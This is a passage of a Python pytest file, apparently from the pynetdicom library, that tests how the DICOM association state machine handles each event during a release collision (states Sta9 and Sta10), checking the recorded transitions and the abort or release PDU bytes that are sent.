assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta6')
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta9')
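# Release collision, requestor side: the local A-RELEASE-RQ (Sta7) crosses
# the peer's A-RELEASE-RQ, so AR-8 leaves the FSM in Sta9.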
def test_evt01(self):
"""Test Sta9 + Evt1."""
# Sta9 + Evt1 -> <ignore> -> Sta9
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta9 + Evt2."""
# Sta9 + Evt2 -> <ignore> -> Sta9
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta9 + Evt3."""
# Sta9 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_ac), # trigger event
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta9 + Evt4."""
# Sta9 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq),
('send', a_associate_rj),
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta9 + Evt5."""
# Sta9 + Evt5 -> <ignore> -> Sta9
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta9 + Evt6."""
# Sta9 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_rq), # trigger event
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta9 + Evt7."""
# Sta9 + Evt7 -> <ignore> -> Sta9
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt7'
]
def test_evt08(self):
"""Test Sta9 + Evt8."""
# Sta9 + Evt8 -> <ignore> -> Sta9
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt8'
]
def test_evt09(self):
"""Test Sta9 + Evt9."""
# Sta9 + Evt9 -> <ignore> -> Sta9
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt9'
]
def test_evt10(self):
"""Test Sta9 + Evt10."""
# Sta9 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', p_data_tf), # trigger event
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta9 + Evt11."""
# Sta9 + Evt11 -> <ignore> -> Sta9
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt11'
]
def test_evt12(self):
"""Test Sta9 + Evt12."""
# Sta9 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rq), # trigger event
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta9 + Evt13."""
# Sta9 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp), # trigger event
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt13'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta9 + Evt14."""
# Sta9 + Evt14 -> AR-9 -> Sta11
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-9: Send A-RELEASE-RP PDU to <remote>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq),
('recv', None), # recv a-release-rp
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14'
]
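# AR-9 should send an A-RELEASE-RP PDU (type 0x06) to the peer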
assert scp.handlers[0].received[2] == (
b'\x06\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt15(self):
"""Test Sta9 + Evt15."""
# Sta9 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt15', 'AA-1'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt15'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta9 + Evt16."""
# Sta9 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_abort), # trigger event
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt16'
]
def test_evt17(self):
"""Test Sta9 + Evt17."""
# Sta9 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt17'
]
def test_evt18(self):
"""Test Sta9 + Evt18."""
# Sta9 + Evt18 -> <ignore> -> Sta9
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt18'
]
def test_evt19(self):
"""Test Sta9 + Evt19."""
# Sta9 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', b'\x08\x00\x00\x00\x00\x00'), # trigger event
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState10(TestStateBase):
"""Tests for State 10: Release collision acc - awaiting A-RELEASE-RP ."""
def move_to_state(self, assoc, scp):
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta6')
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta10')
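# Same collision sequence as TestState09, but the local AE acts as the
# association acceptor, so AR-8 leaves the FSM in Sta10.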
def test_evt01(self):
"""Test Sta10 + Evt1."""
# Sta10 + Evt1 -> <ignore> -> Sta10
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
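# Acceptor-side association: the peer connects and sends the A-ASSOCIATE-RQ,
# so the FSM's history starts with Evt5/Evt6/Evt7 (Sta2 -> Sta3 -> Sta6).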
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta10 + Evt2."""
# Sta10 + Evt2 -> <ignore> -> Sta10
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta10 + Evt3."""
# Sta10 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_ac), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt3', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta10 + Evt4."""
# Sta10 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_rj), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt4', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta10 + Evt5."""
# Sta10 + Evt5 -> <ignore> -> Sta10
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta10 + Evt6."""
# Sta10 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_rq), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt6', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta10 + Evt7."""
# Sta10 + Evt7 -> <ignore> -> Sta10
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt7'
]
def test_evt08(self):
"""Test Sta10 + Evt8."""
# Sta10 + Evt8 -> <ignore> -> Sta10
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt8'
]
def test_evt09(self):
"""Test Sta10 + Evt9."""
# Sta10 + Evt9 -> <ignore> -> Sta10
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt9'
]
def test_evt10(self):
"""Test Sta10 + Evt10."""
# Sta10 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', p_data_tf), # trigger event
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt10', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta10 + Evt11."""
# Sta10 + Evt11 -> <ignore> -> Sta10
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
